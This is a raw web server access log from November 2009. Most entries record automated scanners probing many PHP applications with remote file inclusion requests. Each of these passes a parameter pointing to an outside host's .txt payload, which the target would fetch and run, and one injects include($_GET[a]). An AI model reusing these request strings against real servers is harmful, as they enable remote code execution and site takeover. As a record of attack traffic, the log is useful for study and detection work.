195.70.35.48 - - [08/Nov/2009:21:30:25 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:21:30:25 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:21:30:25 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:21:31:03 -0800] "GET /logs///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.207.3.94 - - [08/Nov/2009:21:31:15 -0800] "GET / HTTP/1.1" 200 1048 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.1; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:21:31:35 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.134.38.139 - - [08/Nov/2009:21:31:35 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.134.38.139 - - [08/Nov/2009:21:31:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:12 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:12 -0800] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:12 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:30 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:30 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:30 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:48 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:52 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:33:52 -0800] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:21:34:33 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:34:33 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:34:33 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:34:38 -0800] "GET /logs/access_090413.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:34:38 -0800] "GET /logs/access.log///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:00 -0800] "GET /modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:00 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:00 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:00 -0800] "GET /modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:00 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:00 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:01 -0800] "GET /modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:01 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:01 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:04 -0800] "GET /logs/access_091012.log%20%20//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:05 -0800] "GET /logs/access_091012.log%20%20//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:35:05 -0800] "GET /logs/access_091012.log%20%20//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:35:28 -0800] "GET /logs/access.log///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [08/Nov/2009:21:35:58 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
216.73.105.71 - - [08/Nov/2009:21:35:58 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
216.73.105.71 - - [08/Nov/2009:21:35:58 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:21:36:34 -0800] "GET /logs///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:21:36:34 -0800] "GET //skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:21:36:39 -0800] "GET /logs/access.log%20%20///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:45 -0800] "GET /logs/access_090504.log//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:45 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:45 -0800] "GET /modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:48 -0800] "GET /modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:48 -0800] "GET /logs/access_090504.log//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:48 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:48 -0800] "GET /modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:48 -0800] "GET /logs/access_090504.log//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:36:48 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:37:32 -0800] "GET /logs/access_090914.log//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:37:35 -0800] "GET /logs/access_090914.log//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:37:35 -0800] "GET /logs/access_090914.log//modules/xfsection/modify.php?dir_module=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:21:39:36 -0800] "GET /logs/access_091012.log/skin/korean_pride/write.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:21:39:36 -0800] "GET /logs/skin/korean_pride/write.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:21:39:36 -0800] "GET /skin/korean_pride/write.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:21:40:40 -0800] "GET /logs/access.log///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:21:42:14 -0800] "GET /logs/access.log///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [08/Nov/2009:21:43:00 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
216.73.105.71 - - [08/Nov/2009:21:43:00 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
216.73.105.71 - - [08/Nov/2009:21:43:00 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
82.193.15.3 - - [08/Nov/2009:21:43:19 -0800] "GET /logs/access.log///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [08/Nov/2009:21:45:19 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:43 -0800] "GET /logs/access_090914.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:43 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:44 -0800] "GET /logs/access_090914.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:44 -0800] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:44 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:44 -0800] "GET /logs/access_090914.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:44 -0800] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:45:44 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [08/Nov/2009:21:46:22 -0800] "GET /logs/access_091012.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:46:51 -0800] "GET /logs/access_090413.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:46:51 -0800] "GET /logs/access_090413.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:21:46:51 -0800] "GET /logs/access_090413.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:21:48:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:21:49:07 -0800] "GET /index.php?rage=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
188.92.74.83 - - [08/Nov/2009:21:50:38 -0800] "GET /logs/ HTTP/1.0" 200 4926 "http://galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "galf.org"
188.92.74.83 - - [08/Nov/2009:21:50:43 -0800] "GET / HTTP/1.0" 200 1032 "http://galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "galf.org"
118.220.173.228 - - [08/Nov/2009:21:51:49 -0800] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:51:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:51:50 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.76 - - [08/Nov/2009:21:53:10 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:53:24 -0800] "GET /logs/access_090406.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:53:30 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:53:30 -0800] "GET /logs/access_090406.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:53:30 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:53:34 -0800] "GET /logs/access_090824.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:53:39 -0800] "GET /logs/access_090824.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:21:53:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
77.8.208.57 - - [08/Nov/2009:21:54:01 -0800] "GET /logs/access.log HTTP/1.0" 200 144095 "-" "Wget/1.11.4" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:54:28 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:21:55:37 -0800] "GET /admin/auth!php?xcart_dir=' HTTP/1.0" 404 - "-" "libwww-perl/5.79" "galf.org"
124.0.54.130 - - [08/Nov/2009:21:55:46 -0800] "GET /admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
118.220.173.228 - - [08/Nov/2009:21:56:59 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:57:37 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:57:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:57:51 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:57:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:58:11 -0800] "GET /logs/access_090713.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:21:58:22 -0800] "GET /logs/access_090608.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:59:12 -0800] "GET /logs/access_090713.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:59:40 -0800] "GET //zb41/include/write.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:59:40 -0800] "GET /logs/access_090615.log///zb41/include/write.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:59:40 -0800] "GET /logs///zb41/include/write.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:21:59:44 -0800] "GET /logs//setup.php?dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:21:59:44 -0800] "GET /setup.php?dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:22:00:32 -0800] "GET /logs/access_090330.log//?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:22:00:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:22:01:15 -0800] "GET /logs/access_090907.log//?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:01:35 -0800] "GET //zb41/include/write.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:01:35 -0800] "GET /logs/access_090629.log///zb41/include/write.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:01:35 -0800] "GET /logs///zb41/include/write.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:22:02:00 -0800] "GET /logs/access.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:22:06:49 -0800] "GET /logs/access.log//admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
124.0.54.130 - - [08/Nov/2009:22:06:49 -0800] "GET /admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
124.0.54.130 - - [08/Nov/2009:22:06:50 -0800] "GET /logs//admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
